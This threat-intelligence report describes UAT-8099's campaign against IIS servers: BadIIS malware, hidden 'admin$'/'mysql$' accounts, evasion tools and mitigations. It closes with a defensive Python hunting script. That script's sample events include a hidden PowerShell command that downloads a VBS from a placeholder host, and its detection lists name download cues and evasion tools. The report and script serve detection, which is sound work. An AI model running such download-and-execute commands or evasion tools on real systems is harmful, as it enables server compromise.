Full Report
Cybersecurity researchers have discovered a new campaign attributed to a China-linked threat actor known as UAT-8099 that took place between late 2025 and early 2026. The activity, discovered by Cisco Talos, has targeted vulnerable Internet Information Services (IIS) servers located across Asia, but with a specific focus on targets in Thailand and Vietnam. The scale of the campaign is currently
Analysis Summary
# Threat Actor: UAT-8099
## Attribution & Identity
**Identification:** China-linked threat actor.
**Known Aliases/Associations:** Shares similarities with the threat cluster responsible for the **WEBJACK** campaign (codenamed by WithSecure).
## Activity Summary
UAT-8099 conducted a campaign targeting vulnerable Internet Information Services (IIS) servers between late 2025 and early 2026. This campaign is a continuation of activity first documented in October 2025. The primary objective appears to be facilitating search engine optimization (SEO) fraud through the deployment of the BadIIS malware family.
## Tactics, Techniques & Procedures
- **Initial Access:** Exploiting security vulnerabilities or weak configurations in IIS server file upload features.
- **Execution:** Use of web shells and PowerShell commands to execute discovery and reconnaissance scripts.
- **Persistence:** Deploying VPN tools (SoftEther VPN), using EasyTier for control, and creating hidden user accounts (initially "admin$", evolving to "mysql$" if the former is blocked) to ensure long-term access.
- **Defense Evasion:** Utilizing red team utilities and legitimate tools to hide activity. Using open-source anti-rootkits like OpenArk64 to terminate security product processes. Employing CnCrypt Protect to hide malicious files.
- **Command and Control (C2):** Leveraging the **GotoHTTP** tool, often launched via a Visual Basic Script downloaded by PowerShell, for remote server control.
- **Discovery:** Executing system information gathering commands.
- **Payload Delivery:** Deploying variants of the **BadIIS** malware, specifically tailored for regional targets.
## Targeting
- **Sectors:** No specific sectors explicitly mentioned, but the focus on IIS server compromise suggests targeting organizations relying on Microsoft web infrastructure.
- **Geography:** Broad initial targeting across Asia, including India, Pakistan, and Japan. **Distinct concentration** observed in **Thailand** and **Vietnam**. Previous documentation (Oct 2025) also noted targeting in Canada and Brazil.
- **Victims:** Victims are defined by their hosting of vulnerable IIS servers. Two region-specific malware variants suggest tailored impact:
  - **BadIIS IISHijack:** Targets victims in **Vietnam**.
  - **BadIIS asdSearchEngine:** Primarily targets victims in **Thailand** or those with Thai language preferences.
## Tools & Infrastructure
- **Malware Families Used:**
  - **BadIIS (multiple variants):** The primary malware for achieving the SEO fraud objective.
  - **GotoHTTP:** Used for remote control/C2 functionality.
- **Utilities/Other Tools:**
  - Sharp4RemoveLog (for removing Windows event logs)
  - CnCrypt Protect (for file obfuscation)
  - OpenArk64 (anti-rootkit tool)
  - SoftEther VPN
  - EasyTier
- **Infrastructure (C2/Persistence):** Shared C2 infrastructure noted between UAT-8099 and the WEBJACK campaign.
## Implications
UAT-8099 demonstrates operational evolution by integrating legitimate tools and evasion techniques (red team utilities, persistent hidden accounts) to maintain access. Their primary motivation is financial gain through **SEO fraud** (redirecting legitimate search engine crawlers, and traffic from users with specific language settings, to fraud sites), moving beyond simple initial access to establish sophisticated, long-term persistence mechanisms on compromised web servers. The regional customization of the BadIIS malware indicates a focused effort on maximizing the return from this specific fraud operation in key Asian markets.
## Mitigations
- Patch and secure all Internet Information Services (IIS) servers, paying specific attention to file upload feature vulnerabilities.
- Implement robust monitoring for the creation of unusual user accounts, particularly those named "admin$" or "mysql$".
- Monitor for the execution of PowerShell scripts deploying VBS files or remotely downloading tools like GotoHTTP.
- Review security tooling configurations to detect the use of red team utilities (e.g., OpenArk64) in the environment.
- Implement network segmentation and strict egress filtering to limit the success of C2 communication via tools like GotoHTTP or SoftEther VPN.
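The account-creation and PowerShell/VBS monitoring points above can be turned into concrete hunt logic. The script below is an added example written for this report; it is not code from Cisco Talos or from the report itself. It runs over constructed Windows Security event records (4720 user account created, 4688 process created) that imitate the behaviours described: creation of the "admin$" and "mysql$" accounts, an IIS worker process (w3wp.exe) spawning PowerShell that downloads a .vbs, the script host launching that .vbs, and execution of a utility named after one of the tools listed. The executable-name markers (for example "openark64", "gotohttp") are assumptions about how those tools appear on disk, and the generic "any account ending in $" rule is deliberately broader than the report: on a domain controller, legitimate computer accounts also end in "$", so that rule should be limited to local account creation or tuned against known hostnames.

```python
"""Hunt for UAT-8099-style persistence and execution indicators in Windows Security events.

Added example for this report (not Talos or report code). Event records are constructed
samples carrying only the fields the rules need; a real deployment would feed parsed
4720/4688 events from Event Forwarding, Sysmon, or an EDR into hunt().
"""
from dataclasses import dataclass

# Constructed sample events (not real telemetry). 4720 = account created, 4688 = process created.
SAMPLE_EVENTS = [
    {"EventID": 4720, "TargetUserName": "svc_backup", "SubjectUserName": "itadmin"},
    {"EventID": 4720, "TargetUserName": "admin$", "SubjectUserName": "IUSR"},
    {"EventID": 4720, "TargetUserName": "mysql$", "SubjectUserName": "DefaultAppPool"},
    {"EventID": 4720, "TargetUserName": "backup$", "SubjectUserName": "DefaultAppPool"},
    {"EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/g.vbs','C:\Windows\Temp\g.vbs')",
     "ParentProcessName": r"C:\Windows\System32\inetsrv\w3wp.exe"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Windows\Temp\g.vbs",
     "ParentProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 4688, "NewProcessName": r"C:\Users\Public\OpenArk64.exe",
     "CommandLine": "OpenArk64.exe", "ParentProcessName": r"C:\Windows\explorer.exe"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "ParentProcessName": r"C:\Windows\explorer.exe"},
]

# Account names the report attributes to UAT-8099.
KNOWN_HIDDEN_ACCOUNTS = {"admin$", "mysql$"}
# Assumed on-disk names of the tools the report lists; treat as tunable, not authoritative.
TOOL_MARKERS = ("openark64", "sharp4removelog", "gotohttp", "easytier", "cncrypt")
# Command-line fragments that indicate PowerShell fetching content from the network.
DOWNLOAD_CUES = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr ",
                 "curl ", "wget ", "bitsadmin", "start-bitstransfer")


@dataclass
class Finding:
    rule: str
    event: dict


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_account_creation(ev: dict) -> list:
    """Rules for 4720: exact match on the report's account names, then the broader $-suffix rule."""
    name = ev.get("TargetUserName", "")
    if name.lower() in KNOWN_HIDDEN_ACCOUNTS:
        return [Finding("known-hidden-account", ev)]
    # Names ending in "$" are hidden from `net user` listings; on domain controllers
    # legitimate computer accounts share this suffix, so tune this rule to local accounts.
    if name.endswith("$"):
        return [Finding("dollar-suffixed-account", ev)]
    return []


def check_process_creation(ev: dict) -> list:
    """Rules for 4688 covering the PowerShell -> VBS chain, IIS-spawned shells and listed tools."""
    proc = ev.get("NewProcessName", "").lower()
    cmd = ev.get("CommandLine", "").lower()
    parent = ev.get("ParentProcessName", "").lower()
    findings = []
    if proc.endswith("powershell.exe") and (".vbs" in cmd or any(c in cmd for c in DOWNLOAD_CUES)):
        findings.append(Finding("powershell-download-or-vbs", ev))
    # An IIS worker process starting a shell is the classic web shell execution cue.
    if parent.endswith("w3wp.exe") and proc.endswith(("powershell.exe", "cmd.exe")):
        findings.append(Finding("iis-worker-spawned-shell", ev))
    if proc.endswith(("wscript.exe", "cscript.exe")) and ".vbs" in cmd and parent.endswith("powershell.exe"):
        findings.append(Finding("vbs-launched-from-powershell", ev))
    base = _basename(proc)
    if any(marker in base for marker in TOOL_MARKERS):
        findings.append(Finding("red-team-or-evasion-tool", ev))
    return findings


def hunt(events: list) -> list:
    """Dispatch each event to the rule set for its EventID and collect all findings."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 4720:
            findings.extend(check_account_creation(ev))
        elif ev.get("EventID") == 4688:
            findings.extend(check_process_creation(ev))
    return findings


def rule_counts(findings: list) -> dict:
    """Count findings per rule; useful as a quick triage summary."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        who = f.event.get("TargetUserName") or _basename(f.event.get("NewProcessName", ""))
        print(f"[{f.rule}] {who}")
    print(rule_counts(hunt(SAMPLE_EVENTS)))
```

The IIS-worker rule is the one most worth keeping even outside this campaign: w3wp.exe has no routine reason to start PowerShell or cmd.exe, so a single hit there is a higher-confidence signal than any of the name-based rules, which depend on the actor reusing the same account and tool names.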